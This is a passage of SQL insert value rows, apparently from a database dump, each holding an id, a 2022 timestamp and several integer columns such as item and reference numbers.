(1358, '2022-03-16 08:31:32', 1, 2061, 0, 1, 1),
(1359, '2022-03-16 08:31:37', 1, 2058, 0, 1, 1),
(1360, '2022-03-16 09:04:26', 1, 2058, 0, 1, 1),
(1361, '2022-03-16 11:51:39', 1, 2053, 0, 1, 1),
(1362, '2022-03-16 14:12:21', 1, 2064, 0, 1, 1),
(1363, '2022-03-16 19:41:15', 1, 2058, 0, 1, 1),
(1364, '2022-03-17 17:02:45', 1, 2054, 0, 1, 1),
(1365, '2022-03-19 22:07:11', 1, 2061, 0, 1, 1),
(1366, '2022-03-20 07:58:03', 1, 2059, 0, 1, 1),
(1367, '2022-03-20 12:08:51', 1, 2064, 0, 1, 1),
(1368, '2022-03-20 15:40:21', 1, 2061, 0, 1, 1),
(1369, '2022-03-20 22:00:27', 1, 2063, 0, 1, 1),
(1370, '2022-03-21 01:33:25', 1, 2055, 0, 1, 1),
(1371, '2022-03-21 11:26:15', 1, 2055, 0, 1, 1),
(1372, '2022-03-22 00:58:36', 1, 2062, 0, 1, 1),
(1373, '2022-03-22 01:46:39', 1, 2063, 0, 1, 1),
(1374, '2022-03-22 21:45:59', 1, 2053, 0, 1, 1),
(1375, '2022-03-23 01:02:02', 1, 2061, 0, 1, 1),
(1376, '2022-03-24 06:37:14', 1, 2063, 0, 1, 1),
(1377, '2022-03-24 10:09:29', 1, 2062, 0, 1, 1),
(1378, '2022-03-24 15:12:39', 1, 2063, 0, 1, 1),
(1379, '2022-03-24 15:12:41', 1, 2064, 0, 1, 1),
(1380, '2022-03-24 15:12:42', 1, 2062, 0, 1, 1),
(1381, '2022-03-24 15:12:44', 1, 2061, 0, 1, 1),
(1382, '2022-03-24 15:12:46', 1, 2060, 0, 1, 1),
(1383, '2022-03-24 15:12:50', 1, 2059, 0, 1, 1),
(1384, '2022-03-25 00:44:13', 1, 2061, 0, 1, 1),
(1385, '2022-03-25 05:26:04', 1, 2061, 0, 1, 1),
(1386, '2022-03-26 04:23:25', 1, 2061, 0, 1, 1),
(1387, '2022-03-26 04:42:16', 1, 2058, 0, 1, 1),
(1388, '2022-03-26 08:20:00', 1, 2054, 0, 1, 1),
(1389, '2022-03-26 08:20:04', 1, 2055, 0, 1, 1),
(1390, '2022-03-26 08:20:19', 1, 2064, 0, 1, 1),
(1391, '2022-03-26 08:20:23', 1, 2063, 0, 1, 1),
(1392, '2022-03-26 08:20:27', 1, 2062, 0, 1, 1),
(1393, '2022-03-26 08:20:30', 1, 2060, 0, 1, 1),
(1394, '2022-03-26 08:20:34', 1, 2059, 0, 1, 1),
(1395, '2022-03-26 08:20:38', 1, 2061, 0, 1, 1),
(1396, '2022-03-26 08:20:42', 1, 2058, 0, 1, 1),
(1397, '2022-03-26 12:15:50', 1, 2053, 0, 1, 1),
(1398, '2022-03-27 13:23:50', 1, 2064, 284, 1, 1),
(1399, '2022-03-27 13:24:53', 1, 2064, 284, 1, 1),
(1400, '2022-03-27 13:25:04', 1, 2064, 284, 1, 1),
(1401, '2022-03-27 13:25:15', 1, 2064, 284, 1, 1),
(1402, '2022-03-28 13:05:32', 1, 2064, 286, 1, 1),
(1403, '2022-03-28 13:06:02', 1, 2064, 286, 1, 1),
(1404, '2022-03-28 13:06:15', 1, 2064, 286, 1, 1),
(1405, '2022-03-28 13:06:29', 1, 2064, 286, 1, 1),
(1406, '2022-03-28 13:43:38', 1, 2058, 0, 1, 1),
(1407, '2022-03-28 14:27:38', 1, 2064, 0, 1, 1),
(1408, '2022-03-29 14:49:18', 1, 2062, 0, 1, 1),
(1409, '2022-03-30 01:22:07', 1, 2055, 0, 1, 1),
(1410, '2022-03-30 01:22:09', 1, 2058, 0, 1, 1),
(1411, '2022-03-30 11:40:51', 1, 2058, 0, 1, 1),
(1412, '2022-03-30 11:40:52', 1, 2061, 0, 1, 1),
(1413, '2022-03-30 11:40:53', 1, 2062, 0, 1, 1),
(1414, '2022-03-30 11:40:55', 1, 2060, 0, 1, 1),
(1415, '2022-03-30 11:40:56', 1, 2063, 0, 1, 1),
(1416, '2022-03-30 11:40:57', 1, 2059, 0, 1, 1),
(1417, '2022-03-30 11:40:59', 1, 2064, 0, 1, 1),
(1418, '2022-03-30 11:41:00', 1, 2055, 0, 1, 1),
(1419, '2022-03-30 21:45:41', 1, 2063, 0, 1, 1),
(1420, '2022-03-30 21:45:42', 1, 2062, 0, 1, 1),
(1421, '2022-03-30 21:45:44', 1, 2064, 0, 1, 1),
(1422, '2022-03-30 21:45:45', 1, 2061, 0, 1, 1),
(1423, '2022-03-30 21:45:46', 1, 2060, 0, 1, 1),
(1424, '2022-03-30 21:45:49', 1, 2059, 0, 1, 1),
(1425, '2022-03-30 21:45:52', 1, 2058, 0, 1, 1),
(1426, '2022-03-31 02:39:06', 1, 2054, 0, 1, 1),
(1427, '2022-03-31 07:22:37', 1, 2061, 0, 1, 1),
(1428, '2022-03-31 23:11:04', 1, 2053, 0, 1, 1),
(1429, '2022-04-01 00:50:35', 1, 2060, 0, 1, 1),
(1430, '2022-04-01 08:30:57', 1, 2064, 0, 1, 1),
(1431, '2022-04-01 09:46:52', 1, 2060, 0, 1, 1),
(1432, '2022-04-01 23:36:44', 1, 2058, 0, 1, 1),
(1433, '2022-04-02 08:03:38', 1, 2064, 290, 1, 1),
(1434, '2022-04-02 08:06:02', 1, 2064, 290, 1, 1),
(1435, '2022-04-02 08:06:35', 1, 2064, 290, 1, 1),
(1436, '2022-04-02 08:08:01', 1, 2064, 290, 1, 1),
(1437, '2022-04-02 12:42:25', 1, 2060, 0, 1, 1),
(1438, '2022-04-02 13:59:47', 1, 2061, 0, 1, 1),
(1439, '2022-04-03 15:21:11', 1, 2058, 0, 1, 1),
(1440, '2022-04-03 19:00:19', 1, 2062, 0, 1, 1),
(1441, '2022-04-03 20:28:48', 1, 2063, 0, 1, 1),
(1442, '2022-04-05 03:06:58', 1, 2064, 0, 1, 1),
(1443, '2022-04-05 03:07:03', 1, 2063, 0, 1, 1),
(1444, '2022-04-05 03:07:08', 1, 2062, 0, 1, 1),
(1445, '2022-04-05 03:07:09', 1, 2061, 0, 1, 1),
(1446, '2022-04-05 04:06:23', 1, 2055, 0, 1, 1),
(1447, '2022-04-05 04:06:23', 1, 2054, 0, 1, 1),
(1448, '2022-04-05 04:06:32', 1, 2064, 0, 1, 1),
(1449, '2022-04-05 04:06:33', 1, 2063, 0, 1, 1),
(1450, '2022-04-05 04:06:34', 1, 2062, 0, 1, 1),
(1451, '2022-04-05 04:06:35', 1, 2060, 0, 1, 1),
(1452, '2022-04-05 04:06:36', 1, 2059, 0, 1, 1),
(1453, '2022-04-05 04:06:37', 1, 2061, 0, 1, 1),
(1454, '2022-04-05 04:06:43', 1, 2058, 0, 1, 1),
(1455, '2022-04-05 13:56:19', 1, 2061, 0, 1, 1),
(1456, '2022-04-07 12:15:57', 1, 2061, 0, 1, 1),
(1457, '2022-04-07 20:35:00', 1, 2054, 0, 1, 1),
(1458, '2022-04-09 13:50:50', 1, 2063, 0, 1, 1),
(1459, '2022-04-10 09:02:21', 1, 2063, 0, 1, 1),
(1460, '2022-04-10 10:04:32', 1, 2061, 0, 1, 1),
(1461, '2022-04-10 12:37:08', 1, 2063, 0, 1, 1),
(1462, '2022-04-11 09:06:25', 1, 2064, 0, 1, 1),
(1463, '2022-04-11 09:06:45', 1, 2063, 0, 1, 1),
(1464, '2022-04-11 09:06:57', 1, 2062, 0, 1, 1),
(1465, '2022-04-11 09:07:09', 1, 2061, 0, 1, 1),
(1466, '2022-04-11 09:07:21', 1, 2060, 0, 1, 1),
(1467, '2022-04-11 09:07:39', 1, 2059, 0, 1, 1),
(1468, '2022-04-11 09:07:49', 1, 2058, 0, 1, 1),
(1469, '2022-04-11 09:08:01', 1, 2055, 0, 1, 1),
(1470, '2022-04-11 09:08:15', 1, 2054, 0, 1, 1),
(1471, '2022-04-12 06:07:12', 1, 2053, 0, 1, 1),
(1472, '2022-04-12 12:46:33', 1, 2058, 0, 1, 1),
(1473, '2022-04-12 17:33:38', 1, 2063, 0, 1, 1),
(1474, '2022-04-12 20:54:49', 1, 2064, 0, 1, 1),
(1475, '2022-04-13 02:20:41', 1, 2059, 0, 1, 1),
(1476, '2022-04-13 02:35:39', 1, 2059, 0, 1, 1),
(1477, '2022-04-13 15:20:38', 1, 2054, 0, 1, 1),
(1478, '2022-04-13 15:20:43', 1, 2055, 0, 1, 1),
(1479, '2022-04-13 15:21:05', 1, 2064, 0, 1, 1),
(1480, '2022-04-13 15:21:16', 1, 2063, 0, 1, 1),
(1481, '2022-04-13 15:21:22', 1, 2062, 0, 1, 1),
(1482, '2022-04-13 15:21:26', 1, 2060, 0, 1, 1),
(1483, '2022-04-13 15:21:33', 1, 2059, 0, 1, 1),
(1484, '2022-04-13 15:21:38', 1, 2061, 0, 1, 1),
(1485, '2022-04-13 15:21:44', 1, 2058, 0, 1, 1),
(1486, '2022-04-13 19:10:44', 1, 2053, 0, 1, 1),
(1487, '2022-04-14 09:56:28', 1, 2060, 0, 1, 1),
(1488, '2022-04-14 09:57:43', 1, 2060, 0, 1, 1),
(1489, '2022-04-14 17:29:05', 1, 2062, 0, 1, 1),
(1490, '2022-04-15 03:15:43', 1, 2061, 0, 1, 1),
(1491, '2022-04-15 15:39:06', 1, 2054, 0, 1, 1),
(1492, '2022-04-15 15:39:22', 1, 2064, 0, 1, 1),
(1493, '2022-04-15 15:39:26', 1, 2061, 0, 1, 1),
(1494, '2022-04-15 21:07:48', 1, 2063, 0, 1, 1),
(1495, '2022-04-16 06:35:29', 1, 2064, 301, 1, 1),
(1496, '2022-04-16 06:36:38', 1, 2064, 301, 1, 1),
(1497, '2022-04-16 06:37:35', 1, 2064, 301, 1, 1),
(1498, '2022-04-16 06:38:00', 1, 2064, 301, 1, 1),
(1499, '2022-04-17 12:56:07', 1, 2061, 0, 1, 1),
(1500, '2022-04-17 13:48:02', 1, 2053, 0, 1, 1),
(1501, '2022-04-17 14:05:16', 1, 2054, 0, 1, 1),
(1502, '2022-04-17 20:13:43', 1, 2053, 0, 1, 1),
(1503, '2022-04-17 20:13:47', 1, 2055, 0, 1, 1),
(1504, '2022-04-17 20:14:05', 1, 2063, 0, 1, 1),
(1505, '2022-04-17 20:14:08', 1, 2062, 0, 1, 1),
(1506, '2022-04-17 20:14:12', 1, 2060, 0, 1, 1),
(1507, '2022-04-17 20:14:17', 1, 2059, 0, 1, 1),
(1508, '2022-04-17 20:14:21', 1, 2058, 0, 1, 1),
(1509, '2022-04-17 21:35:11', 1, 2061, 0, 1, 1),
(1510, '2022-04-17 23:20:14', 1, 2061, 0, 1, 1),
(1511, '2022-04-18 03:17:58', 1, 2060, 0, 1, 1),
(1512, '2022-04-18 07:15:33', 1, 2061, 0, 1, 1),
(1513, '2022-04-18 09:01:26', 1, 2061, 0, 1, 1),
(1514, '2022-04-18 16:15:50', 1, 2061, 0, 1, 1),
(1515, '2022-04-19 13:07:54', 1, 2059, 0, 1, 1),
(1516, '2022-04-19 22:14:05', 1, 2061, 0, 1, 1),
(1517, '2022-04-20 03:55:37', 1, 2058, 0, 1, 1),
(1518, '2022-04-20 07:40:18', 1, 2064, 0, 1, 1),
(1519, '2022-04-20 12:52:02', 1, 2061, 0, 1, 1),
(1520, '2022-04-21 02:28:08', 1, 2061, 0, 1, 1),
(1521, '2022-04-21 02:36:30', 1, 2053, 0, 1, 1),
(1522, '2022-04-21 03:43:21', 1, 2059, 0, 1, 1),
(1523, '2022-04-21 16:12:50', 1, 2061, 0, 1, 1),
(1524, '2022-04-21 20:30:38', 1, 2062, 0, 1, 1),
(1525, '2022-04-22 15:13:42', 1, 2061, 0, 1, 1),
(1526, '2022-04-22 17:35:17', 1, 2061, 0, 1, 1),
(1527, '2022-04-23 00:05:23', 1, 2064, 316, 1, 1),
(1528, '2022-04-23 00:05:50', 1, 2064, 316, 1, 1),
(1529, '2022-04-23 00:06:01', 1, 2064, 316, 1, 1),
(1530, '2022-04-23 00:06:15', 1, 2064, 316, 1, 1),
(1531, '2022-04-23 06:35:04', 1, 2061, 0, 1, 1),
(1532, '2022-04-23 20:44:54', 1, 2061, 0, 1, 1),
(1533, '2022-04-24 00:46:13', 1, 2054, 0, 1, 1),
(1534, '2022-04-24 00:47:11', 1, 2055, 0, 1, 1),
(1535, '2022-04-24 00:52:13', 1, 2064, 0, 1, 1),
(1536, '2022-04-24 00:53:41', 1, 2063, 0, 1, 1),
(1537, '2022-04-24 00:55:42', 1, 2062, 0, 1, 1),
(1538, '2022-04-24 00:58:42', 1, 2060, 0, 1, 1),
(1539, '2022-04-24 01:00:12', 1, 2059, 0, 1, 1),
(1540, '2022-04-24 01:01:43', 1, 2061, 0, 1, 1),
(1541, '2022-04-24 01:02:42', 1, 2058, 0, 1, 1),
(1542, '2022-04-24 05:31:30', 1, 2061, 0, 1, 1),
(1543, '2022-04-25 01:40:43', 1, 2061, 0, 1, 1),
(1544, '2022-04-25 02:05:57', 1, 2058, 0, 1, 1),
(1545, '2022-04-26 06:58:44', 1, 2064, 0, 1, 1),
(1546, '2022-04-26 13:52:48', 1, 2063, 0, 1, 1),
(1547, '2022-04-27 05:16:48', 1, 2055, 0, 1, 1),
(1548, '2022-04-28 10:49:36', 1, 2055, 0, 1, 1),
(1549, '2022-04-28 12:47:51', 1, 2058, 0, 1, 1),
(1550, '2022-04-28 12:47:53', 1, 2061, 0, 1, 1),
(1551, '2022-04-28 12:47:54', 1, 2062, 0, 1, 1),
(1552, '2022-04-28 12:47:55', 1, 2060, 0, 1, 1),
(1553, '2022-04-28 12:47:57', 1, 2063, 0, 1, 1),
(1554, '2022-04-28 12:47:58', 1, 2059, 0, 1, 1),
(1555, '2022-04-28 12:47:59', 1, 2064, 0, 1, 1),
(1556, '2022-04-28 12:48:01', 1, 2055, 0, 1, 1),
(1557, '2022-04-28 14:38:18', 1, 2058, 0, 1, 1),
(1558, '2022-04-29 06:31:31', 1, 2061, 0, 1, 1),
(1559, '2022-04-29 07:46:02', 1, 2061, 0, 1, 1),
(1560, '2022-04-29 11:05:23', 1, 2055, 0, 1, 1),
(1561, '2022-04-29 16:38:07', 1, 2061, 0, 1, 1),
(1562, '2022-04-29 17:39:18', 1, 2061, 0, 1, 1),
(1563, '2022-04-30 02:52:56', 1, 2061, 0, 1, 1),
(1564, '2022-04-30 11:06:15', 1, 2061, 0, 1, 1),
(1565, '2022-04-30 18:38:00', 1, 2061, 0, 1, 1),
(1566, '2022-04-30 19:57:53', 1, 2064, 0, 1, 1),
(1567, '2022-04-30 20:04:07', 1, 2053, 0, 1, 1),
(1568, '2022-05-01 04:09:29', 1, 2063, 0, 1, 1),
(1569, '2022-05-01 08:53:08', 1, 2054, 0, 1, 1),
(1570, '2022-05-01 17:41:02', 1, 2061, 0, 1, 1),
(1571, '2022-05-01 17:47:01', 1, 2064, 0, 1, 1),
(1572, '2022-05-01 18:01:27', 1, 2060, 0, 1, 1),
(1573, '2022-05-01 22:17:10', 1, 2059, 0, 1, 1),
(1574, '2022-05-01 23:40:44', 1, 2055, 0, 1, 1),
(1575, '2022-05-02 01:22:04', 1, 2061, 0, 1, 1),
(1576, '2022-05-02 01:31:47', 1, 2055, 0, 1, 1),
(1577, '2022-05-02 02:38:25', 1, 2061, 0, 1, 1),
(1578, '2022-05-02 05:48:15', 1, 2055, 0, 1, 1),
(1579, '2022-05-02 18:09:06', 1, 2062, 0, 1, 1),
(1580, '2022-05-03 02:48:46', 1, 2061, 0, 1, 1),
(1581, '2022-05-03 12:07:00', 1, 2061, 0, 1, 1),
(1582, '2022-05-03 12:51:01', 1, 2061, 0, 1, 1),
(1583, '2022-05-03 16:24:57', 1, 2063, 0, 1, 1),
(1584, '2022-05-04 03:31:42', 1, 2061, 0, 1, 1),
(1585, '2022-05-04 05:52:43', 1, 2059, 0, 1, 1),
(1586, '2022-05-04 07:24:10', 1, 2060, 0, 1, 1),
(1587, '2022-05-04 11:51:39', 1, 2062, 0, 1, 1),
(1588, '2022-05-04 14:35:17', 1, 2055, 0, 1, 1),
(1589, '2022-05-04 16:34:08', 1, 2054, 0, 1, 1),
(1590, '2022-05-04 17:00:11', 1, 2054, 0, 1, 1),
(1591, '2022-05-04 17:45:11', 1, 2054, 0, 1, 1),
(1592, '2022-05-05 21:24:00', 1, 2059, 0, 1, 1),
(1593, '2022-05-05 22:26:25', 1, 2064, 334, 1, 1),
(1594, '2022-05-06 01:54:01', 1, 2054, 0, 1, 1),
(1595, '2022-05-06 17:43:37', 1, 2064, 0, 1, 1),
(1596, '2022-05-06 18:27:20', 1, 2064, 337, 1, 1),
(1597, '2022-05-06 18:27:34', 1, 2064, 337, 1, 1),
(1598, '2022-05-06 18:27:43', 1, 2064, 337, 1, 1),
(1599, '2022-05-06 18:27:53', 1, 2064, 337, 1, 1),
(1600, '2022-05-07 03:03:04', 1, 2058, 0, 1, 1),
(1601, '2022-05-07 04:58:13', 1, 2055, 0, 1, 1),
(1602, '2022-05-07 04:58:17', 1, 2064, 0, 1, 1),
(1603, '2022-05-07 04:58:20', 1, 2061, 0, 1, 1),
(1604, '2022-05-07 04:58:23', 1, 2058, 0, 1, 1),
(1605, '2022-05-07 12:00:21', 1, 2061, 0, 1, 1),
(1606, '2022-05-07 12:07:41', 1, 2061, 0, 1, 1),
(1607, '2022-05-08 03:56:31', 1, 2063, 0, 1, 1),
(1608, '2022-05-08 04:23:02', 1, 2064, 0, 1, 1),
(1609, '2022-05-08 05:40:37', 1, 2061, 0, 1, 1),
(1610, '2022-05-08 05:49:58', 1, 2061, 0, 1, 1),
(1611, '2022-05-09 01:09:00', 1, 2061, 0, 1, 1),
(1612, '2022-05-09 01:13:51', 1, 2054, 0, 1, 1),
(1613, '2022-05-09 02:39:07', 1, 2058, 0, 1, 1),
(1614, '2022-05-09 02:57:18', 1, 2054, 0, 1, 1),
(1615, '2022-05-09 15:51:47', 1, 2064, 0, 1, 1),
(1616, '2022-05-10 01:11:32', 1, 2062, 0, 1, 1),
(1617, '2022-05-10 13:09:31', 1, 2064, 0, 1, 1),
(1618, '2022-05-10 20:51:44', 1, 2064, 0, 1, 1),
(1619, '2022-05-11 04:44:11', 1, 2061, 0, 1, 1),
(1620, '2022-05-11 08:21:01', 1, 2062, 0, 1, 1),
(1621, '2022-05-12 01:10:24', 1, 2062, 0, 1, 1),
(1622, '2022-05-12 17:26:02', 1, 2061, 0, 1, 1),
(1623, '2022-05-12 17:36:00', 1, 2062, 0, 1, 1),
(1624, '2022-05-12 17:39:59', 1, 2062, 343, 1, 1),
(1625, '2022-05-12 22:42:57', 1, 2061, 0, 1, 1),
(1626, '2022-05-13 08:53:20', 1, 2059, 0, 1, 1),
(1627, '2022-05-13 09:15:50', 1, 2059, 0, 1, 1),
(1628, '2022-05-13 22:27:44', 1, 2058, 0, 1, 1),
(1629, '2022-05-13 22:27:52', 1, 2054, 0, 1, 1),
(1630, '2022-05-13 22:28:16', 1, 2060, 0, 1, 1),
(1631, '2022-05-13 22:28:19', 1, 2064, 0, 1, 1),
(1632, '2022-05-13 22:28:32', 1, 2061, 0, 1, 1),
(1633, '2022-05-13 22:28:43', 1, 2062, 0, 1, 1),
(1634, '2022-05-13 22:28:46', 1, 2055, 0, 1, 1),
(1635, '2022-05-13 22:28:56', 1, 2059, 0, 1, 1),
(1636, '2022-05-13 22:28:59', 1, 2063, 0, 1, 1),
(1637, '2022-05-13 22:31:25', 1, 2054, 0, 1, 1),
(1638, '2022-05-13 22:31:33', 1, 2058, 0, 1, 1),
(1639, '2022-05-13 22:31:44', 1, 2064, 0, 1, 1),
(1640, '2022-05-13 22:31:50', 1, 2062, 0, 1, 1),
(1641, '2022-05-13 22:31:52', 1, 2055, 0, 1, 1),
(1642, '2022-05-13 22:31:59', 1, 2060, 0, 1, 1),
(1643, '2022-05-13 22:32:03', 1, 2059, 0, 1, 1),
(1644, '2022-05-13 22:32:05', 1, 2063, 0, 1, 1),
(1645, '2022-05-13 22:32:07', 1, 2061, 0, 1, 1),
(1646, '2022-05-13 22:32:20', 1, 2053, 0, 1, 1),
(1647, '2022-05-14 00:41:51', 1, 2064, 0, 1, 1),
(1648, '2022-05-14 00:42:22', 1, 2054, 0, 1, 1),
(1649, '2022-05-14 00:42:27', 1, 2055, 0, 1, 1),
(1650, '2022-05-14 00:42:33', 1, 2058, 0, 1, 1),
(1651, '2022-05-14 00:42:38', 1, 2061, 0, 1, 1),
(1652, '2022-05-14 00:42:44', 1, 2060, 0, 1, 1),
(1653, '2022-05-14 00:42:50', 1, 2059, 0, 1, 1),
(1654, '2022-05-14 00:42:55', 1, 2063, 0, 1, 1),
(1655, '2022-05-14 00:43:01', 1, 2062, 0, 1, 1),
(1656, '2022-05-14 00:44:07', 1, 2053, 0, 1, 1),
(1657, '2022-05-14 01:55:18', 1, 2064, 349, 1, 1),
(1658, '2022-05-14 01:55:36', 1, 2064, 349, 1, 1),
(1659, '2022-05-14 01:55:45', 1, 2064, 349, 1, 1),
(1660, '2022-05-14 01:55:57', 1, 2064, 349, 1, 1),
(1661, '2022-05-14 02:07:38', 1, 2054, 0, 1, 1),
(1662, '2022-05-14 06:39:38', 1, 2054, 0, 1, 1),
(1663, '2022-05-14 07:04:32', 1, 2061, 0, 1, 1),
(1664, '2022-05-15 03:13:12', 1, 2054, 0, 1, 1),
(1665, '2022-05-15 04:02:02', 1, 2064, 0, 1, 1),
(1666, '2022-05-15 05:40:57', 1, 2060, 0, 1, 1),
(1667, '2022-05-15 07:45:07', 1, 2064, 0, 1, 1),
(1668, '2022-05-15 23:42:56', 1, 2063, 0, 1, 1),
(1669, '2022-05-17 04:08:59', 1, 2062, 0, 1, 1),
(1670, '2022-05-17 04:38:57', 1, 2062, 0, 1, 1),
(1671, '2022-05-17 04:48:57', 1, 2062, 0, 1, 1),
(1672, '2022-05-17 06:08:57', 1, 2061, 0, 1, 1),
(1673, '2022-05-17 16:07:00', 1, 2062, 0, 1, 1),
(1674, '2022-05-17 16:44:54', 1, 2061, 0, 1, 1),
(1675, '2022-05-18 03:58:47', 1, 2062, 0, 1, 1),
(1676, '2022-05-18 06:32:10', 1, 2061, 0, 1, 1),
(1677, '2022-05-18 14:09:00', 1, 2054, 0, 1, 1),
(1678, '2022-05-19 03:40:32', 1, 2062, 0, 1, 1),
(1679, '2022-05-19 04:21:52', 1, 2061, 0, 1, 1),
(1680, '2022-05-19 07:45:52', 1, 2062, 0, 1, 1),
(1681, '2022-05-19 14:47:51', 1, 2060, 0, 1, 1),
(1682, '2022-05-19 15:45:44', 1, 2063, 0, 1, 1),
(1683, '2022-05-19 20:48:10', 1, 2062, 0, 1, 1),
(1684, '2022-05-20 03:28:24', 1, 2060, 0, 1, 1),
(1685, '2022-05-20 07:36:50', 1, 2054, 0, 1, 1),
(1686, '2022-05-21 03:47:21', 1, 2061, 0, 1, 1),
(1687, '2022-05-21 05:46:36', 1, 2059, 0, 1, 1),
(1688, '2022-05-21 13:50:56', 1, 2058, 0, 1, 1),
(1689, '2022-05-21 17:07:08', 1, 2061, 0, 1, 1),
(1690, '2022-05-21 23:15:48', 1, 2060, 0, 1, 1),
(1691, '2022-05-21 23:17:56', 1, 2060, 0, 1, 1),
(1692, '2022-05-22 15:41:40', 1, 2062, 0, 1, 1),
(1693, '2022-05-22 16:49:09', 1, 2061, 0, 1, 1),
(1694, '2022-05-24 03:38:44', 1, 2063, 0, 1, 1),
(1695, '2022-05-24 15:37:33', 1, 2062, 0, 1, 1),
(1696, '2022-05-24 17:17:18', 1, 2061, 0, 1, 1),
(1697, '2022-05-25 05:33:53', 1, 2061, 0, 1, 1),
(1698, '2022-05-25 13:00:41', 1, 2058, 0, 1, 1),
(1699, '2022-05-25 13:00:43', 1, 2061, 0, 1, 1),
(1700, '2022-05-25 13:00:44', 1, 2062, 0, 1, 1),
(1701, '2022-05-25 13:00:46', 1, 2060, 0, 1, 1),
(1702, '2022-05-25 13:00:47', 1, 2063, 0, 1, 1),
(1703, '2022-05-25 13:00:49', 1, 2059, 0, 1, 1),
(1704, '2022-05-25 13:00:52', 1, 2064, 0, 1, 1),
(1705, '2022-05-25 13:00:54', 1, 2055, 0, 1, 1),
(1706, '2022-05-25 19:21:53', 1, 2054, 0, 1, 1),
(1707, '2022-05-26 13:53:12', 1, 2062, 0, 1, 1),
(1708, '2022-05-26 13:53:36', 1, 2062, 0, 1, 1),
(1709, '2022-05-26 14:01:12', 1, 2062, 0, 1, 1),
(1710, '2022-05-26 14:02:31', 1, 2062, 0, 1, 1),
(1711, '2022-05-26 15:14:29', 1, 2062, 0, 1, 1),
(1712, '2022-05-27 06:35:27', 1, 2061, 0, 1, 1),
(1713, '2022-05-27 10:04:01', 1, 2054, 0, 1, 1),
(1714, '2022-05-27 10:04:08', 1, 2055, 0, 1, 1),
(1715, '2022-05-27 10:04:27', 1, 2064, 0, 1, 1),
(1716, '2022-05-27 10:04:31', 1, 2063, 0, 1, 1),
(1717, '2022-05-27 10:04:35', 1, 2062, 0, 1, 1),
(1718, '2022-05-27 10:04:39', 1, 2060, 0, 1, 1),
(1719, '2022-05-27 10:04:45', 1, 2059, 0, 1, 1),
(1720, '2022-05-27 10:04:50', 1, 2061, 0, 1, 1),
(1721, '2022-05-27 10:04:54', 1, 2058, 0, 1, 1),
(1722, '2022-05-27 11:49:34', 1, 2064, 0, 1, 1),
(1723, '2022-05-27 11:49:48', 1, 2063, 0, 1, 1),
(1724, '2022-05-27 11:49:59', 1, 2062, 0, 1, 1),
(1725, '2022-05-27 11:50:11', 1, 2061, 0, 1, 1),
(1726, '2022-05-27 11:50:23', 1, 2060, 0, 1, 1),
(1727, '2022-05-27 11:50:34', 1, 2059, 0, 1, 1),
(1728, '2022-05-27 11:50:45', 1, 2058, 0, 1, 1),
(1729, '2022-05-27 11:51:00', 1, 2055, 0, 1, 1),
(1730, '2022-05-27 11:51:15', 1, 2054, 0, 1, 1),
(1731, '2022-05-27 12:07:36', 1, 2053, 0, 1, 1),
(1732, '2022-05-27 14:32:31', 1, 2053, 0, 1, 1),
(1733, '2022-05-28 02:23:45', 1, 2063, 0, 1, 1),
(1734, '2022-05-29 05:08:28', 1, 2058, 0, 1, 1),
(1735, '2022-05-29 07:52:43', 1, 2061, 0, 1, 1),
(1736, '2022-05-29 13:21:39', 1, 2061, 0, 1, 1),
(1737, '2022-05-30 20:07:09', 1, 2055, 0, 1, 1),
(1738, '2022-05-30 20:07:11', 1, 2058, 0, 1, 1),
(1739, '2022-05-31 05:10:05', 1, 2061, 0, 1, 1),
(1740, '2022-05-31 09:35:09', 1, 2054, 0, 1, 1),
(1741, '2022-05-31 14:17:22', 1, 2062, 0, 1, 1),
(1742, '2022-06-01 23:17:43', 1, 2062, 0, 1, 1),
(1743, '2022-06-02 00:03:33', 1, 2061, 0, 1, 1),
(1744, '2022-06-02 10:20:53', 1, 2061, 0, 1, 1),
(1745, '2022-06-02 12:31:37', 1, 2062, 0, 1, 1),
(1746, '2022-06-03 05:38:51', 1, 2062, 0, 1, 1),
(1747, '2022-06-03 09:37:20', 1, 2058, 0, 1, 1),
(1748, '2022-06-03 09:44:56', 1, 2063, 0, 1, 1),
(1749, '2022-06-03 10:16:43', 1, 2061, 0, 1, 1),
(1750, '2022-06-04 02:56:23', 1, 2054, 0, 1, 1),
(1751, '2022-06-04 02:56:26', 1, 2055, 0, 1, 1),
(1752, '2022-06-04 02:57:06', 1, 2064, 0, 1, 1),
(1753, '2022-06-04 02:57:07', 1, 2062, 0, 1, 1),
(1754, '2022-06-04 02:57:08', 1, 2063, 0, 1, 1),
(1755, '2022-06-04 02:57:20', 1, 2060, 0, 1, 1),
(1756, '2022-06-04 02:57:21', 1, 2059, 0, 1, 1),
(1757, '2022-06-04 02:57:22', 1, 2061, 0, 1, 1),
(1758, '2022-06-04 02:57:27', 1, 2058, 0, 1, 1),
(1759, '2022-06-04 19:01:15', 1, 2060, 0, 1, 1),
(1760, '2022-06-04 19:05:38', 1, 2063, 0, 1, 1),
(1761, '2022-06-04 19:15:57', 1, 2058, 0, 1, 1),
(1762, '2022-06-04 19:35:01', 1, 2055, 0, 1, 1),
(1763, '2022-06-04 20:06:13', 1, 2061, 0, 1, 1),
(1764, '2022-06-04 20:22:03', 1, 2062, 0, 1, 1),
(1765, '2022-06-04 20:52:40', 1, 2054, 0, 1, 1),
(1766, '2022-06-04 20:59:30', 1, 2059, 0, 1, 1),
(1767, '2022-06-04 21:05:10', 1, 2064, 0, 1, 1),
(1768, '2022-06-04 22:39:59', 1, 2064, 0, 1, 1),
(1769, '2022-06-05 02:16:31', 1, 2063, 0, 1, 1),
(1770, '2022-06-06 00:04:21', 1, 2054, 0, 1, 1),
(1771, '2022-06-06 03:50:54', 1, 2054, 0, 1, 1),
(1772, '2022-06-07 06:47:19', 1, 2061, 0, 1, 1),
(1773, '2022-06-10 07:41:18', 1, 2061, 0, 1, 1),
(1774, '2022-06-10 08:05:14', 1, 2062, 0, 1, 1),
(1775, '2022-06-10 09:06:34', 1, 2054, 0, 1, 1),
(1776, '2022-06-10 09:06:41', 1, 2055, 0, 1, 1),
(1777, '2022-06-10 09:07:04', 1, 2064, 0, 1, 1),
(1778, '2022-06-10 09:07:10', 1, 2063, 0, 1, 1),
(1779, '2022-06-10 09:07:15', 1, 2062, 0, 1, 1),
(1780, '2022-06-10 09:07:20', 1, 2060, 0, 1, 1),
(1781, '2022-06-10 09:07:26', 1, 2059, 0, 1, 1),
(1782, '2022-06-10 09:07:29', 1, 2061, 0, 1, 1),
(1783, '2022-06-10 09:07:33', 1, 2058, 0, 1, 1),
(1784, '2022-06-10 12:38:40', 1, 2053, 0, 1, 1),
(1785, '2022-06-11 16:27:27', 1, 2058, 0, 1, 1),
